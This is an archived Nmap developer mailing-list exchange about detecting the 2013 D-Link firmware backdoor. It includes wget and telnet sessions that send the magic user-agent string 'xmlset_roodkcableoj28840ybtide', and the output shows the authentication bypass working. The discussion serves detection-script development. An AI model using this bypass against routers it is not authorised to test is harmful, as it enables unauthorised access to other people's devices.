Nmap Development mailing list archives
Re: D-Link firmware backdoor
From: David Maynor <dave () erratasec com>
Date: Wed, 16 Oct 2013 12:54:05 +0000
These are done against the same IP, only difference is the user agent: Davids-Mac-mini:dlink_scan dave$ wget -S --user-agent="xmlset_roodkcableoj28840ybtide" http://xxx.xxx.xxx.xxx --2013-10-15 16:59:43-- http://xxx.xxx.xxx.xxx/ Connecting to xxx.xxx.xxx.xxx:80... connected. HTTP request sent, awaiting response... HTTP/1.0 200 OK Server: Alpha_webserv Date: Tue, 15 Oct 2013 20:59:44 GMT Content-Type: text/html Accept-Ranges: bytes Connection: close X-Pad: avoid browser bug Length: unspecified [text/html] Saving to: ‘index.html’ [ <=> ] 1,445 --.-K/s in 0.009s 2013-10-15 16:59:44 (149 KB/s) - ‘index.html’ saved [1445] Davids-Mac-mini:dlink_scan dave$ wget -S http://xxx.xxx.xxx.xxx --2013-10-15 17:00:09-- http://xxx.xxx.xxx.xxx/ Connecting to xxx.xxx.xxx.xxx:80... connected. HTTP request sent, awaiting response... HTTP/1.1 401 Unauthorized Server: thttpd-alphanetworks/2.23 Content-Type: text/html Date: Tue, 15 Oct 2013 21:00:10 GMT Last-Modified: Tue, 15 Oct 2013 21:00:10 GMT Accept-Ranges: bytes Connection: close WWW-Authenticate: Basic realm="BRL-04R" Authorization failed. Davids-Mac-mini:dlink_scan dave$ The server field gets set depending on you agh status. No auth gets you thttpd-alphanetworks/2.23 and auth gets Alpha_webserv On Oct 16, 2013, at 7:49 AM, Michael Meyer <michael.meyer () greenbone net> wrote:
*** Patrik Karlsson wrote:Please find a script attached to detect the D-Link firmware bypass outlined in this article: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/ It's been a while since I committed something, so I will wait for some feedback before I do.Just a note about...and server:match("^thttpd%-alphanetworks"))On some affected devices the server header is 'Server: Alpha_webserv' instead of 'Server: thttpd-alphanetworks/'...if ( response.status == 200 )...and there are also some devices which do not send a header at all when this fake user-agent is set. On such devices you could check for the existence of 'self.location.href' after successfully bypassing the login. mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080 Trying 192.168.44.8... Connected to 192.168.44.8. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 401 Unauthorized Server: thttpd-alphanetworks/2.23 Content-Type: text/html Date: Tue, 15 Oct 2013 11:51:23 GMT Last-Modified: Tue, 15 Oct 2013 11:51:23 GMT Accept-Ranges: bytes Connection: close WWW-Authenticate: Basic realm="BRL-04UR" <HTML><HEAD><TITLE>401 Unauthorized</TITLE> [...] mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080 Trying 192.168.44.8... Connected to 192.168.44.8. Escape character is '^]'. GET / HTTP/1.0 User-Agent: xmlset_roodkcableoj28840ybtide <HTML> <HEAD> <TITLE>BRL-04UR</TITLE> [...] self.location.href="index1.htm"; [...] Micha -- Michael Meyer OpenPGP Key: 52A6EFA6 http://www.greenbone.net/ Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460 Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Attachment:
signature.asc
Description: Message signed with OpenPGP using GPGMail
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- D-Link firmware backdoor Patrik Karlsson (Oct 15)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)
- Re: D-Link firmware backdoor David Maynor (Oct 16)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)
- Re: D-Link firmware backdoor Patrik Karlsson (Oct 16)
- Re: D-Link firmware backdoor Patrik Karlsson (Oct 17)
- Re: D-Link firmware backdoor David Maynor (Oct 16)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)